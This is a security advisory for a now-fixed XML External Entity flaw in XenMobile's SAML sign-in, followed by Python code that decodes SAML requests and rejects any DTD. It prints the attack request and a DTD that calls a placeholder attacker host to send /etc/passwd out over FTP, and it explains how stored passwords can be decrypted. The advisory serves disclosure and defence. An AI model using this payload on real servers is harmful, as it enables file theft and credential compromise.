It is possible to read most of the files and make network calls to private services on the XenMobile servers without authenticating.
Current state: Fixed
It is possible to read most of the files and make network calls to private services on the XenMobile servers without authenticating by exploiting XML External Entity (XXE) processing in the service's SAML login functionality.
POST /aw/saml/signin/test HTTP/1.1
Host: xenmobile.example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xenmobile.example.com/index_uc.html
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8748

SAMLRequest=[long string of base64 encoded gzipped data]
The start of the base64 string decodes to:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE saml2p:Response [
<!ENTITY % remote SYSTEM "http://attackerip/attack.xml">
%remote;
]>
This references a remote DTD on a server controlled by the attacker, attack.xml:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "ftp://attackerip/%payload;" >'>
%param1;
%external;
This causes the server processing the XML to read the file:// URL, store its contents in a parameter entity, and then make an additional request to the attacker's server with those contents included in the URL.

The URLs can be http://, https://, file:// or ftp://. FTP URLs can contain newline characters, so this method allows us to read files on the server or make HTTP requests to services inside or outside the firewall and then send the result back to an attacker. Any text file can be read as long as it does not contain a % character.
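The DOCTYPE above only becomes visible once the SAMLRequest parameter has been base64-decoded and decompressed, so a detection or mitigation has to work on the decoded XML rather than on the raw request body. The following Python is an added example written for this page; it is not Citrix's code or part of the original advisory. It assumes the encoding the advisory describes (base64 over gzipped XML) and also handles raw DEFLATE and uncompressed XML, since SAML bindings differ. The attackerip host is the advisory's own placeholder, and both sample messages are constructed here.

```python
import base64
import gzip
import re
import zlib
import xml.etree.ElementTree as ET

# Constructed sample: the DOCTYPE shown in the advisory (attackerip is a placeholder
# host, not a real address) wrapped around a minimal SAML 2.0 Response element.
MALICIOUS_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE saml2p:Response [\n'
    '<!ENTITY % remote SYSTEM "http://attackerip/attack.xml">\n'
    '%remote;\n'
    ']>\n'
    '<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>'
)

# Constructed sample: what a legitimate message looks like (no DTD at all).
BENIGN_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" ID="_2"/>'
)


def encode_saml_request(xml_text: str, compress: str = "gzip") -> str:
    """Produce a SAMLRequest value. 'gzip' matches the advisory's description
    (base64 over gzipped XML); 'deflate' is raw DEFLATE as used by the
    HTTP-Redirect binding; 'none' is base64 over plain XML (HTTP-POST binding)."""
    raw = xml_text.encode("utf-8")
    if compress == "gzip":
        raw = gzip.compress(raw)
    elif compress == "deflate":
        c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        raw = c.compress(raw) + c.flush()
    return base64.b64encode(raw).decode("ascii")


def decode_saml_request(value: str) -> bytes:
    """Undo whichever wrapping the value carries and return the XML bytes.
    A DOCTYPE is invisible in the base64 form, so inspection must happen here."""
    data = base64.b64decode(value)
    if data[:2] == b"\x1f\x8b":                          # gzip magic bytes
        return gzip.decompress(data)
    if data.lstrip().startswith(b"<"):                   # already plain XML
        return data
    return zlib.decompress(data, wbits=-zlib.MAX_WBITS)  # raw DEFLATE stream


# Any DOCTYPE or ENTITY declaration; SAML messages never legitimately carry one.
DTD_PATTERN = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(xml_bytes: bytes) -> bool:
    """Detection rule: flag a decoded SAMLRequest that declares a DTD or entity."""
    return DTD_PATTERN.search(xml_bytes) is not None


def parse_saml_safely(value: str) -> ET.Element:
    """Mitigation: refuse the message before it reaches an XML parser if it
    carries a DTD. Rejecting up front means no parser setting (external entity
    loading, parameter entity expansion) can reopen the hole later."""
    xml_bytes = decode_saml_request(value)
    if has_dtd(xml_bytes):
        raise ValueError("SAMLRequest carries a DTD/ENTITY declaration; rejected")
    return ET.fromstring(xml_bytes)


def is_rejected(value: str) -> bool:
    """Accept/reject verdict for callers that do not need the parsed tree."""
    try:
        parse_saml_safely(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, xml in (("malicious", MALICIOUS_XML), ("benign", BENIGN_XML)):
        print(f"{label}: rejected={is_rejected(encode_saml_request(xml))}")
```

The same decode-then-inspect step can run in a WAF or a log pipeline over captured SAMLRequest values; in the application itself, rejecting any DTD outright is simpler and more robust than trying to configure every XML parser feature correctly.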
The server contains configuration files that contain encrypted passwords. There are two ways to decrypt the passwords: either by calling the internal REST API endpoint available at http://localhost:30000/sftu/crypto/dec or by downloading the files in /opt/sas/rt/keys and decrypting the passwords locally.
2018-03-28 – Reported to Citrix and acknowledged immediately
2018-05-21 – Issue reported fixed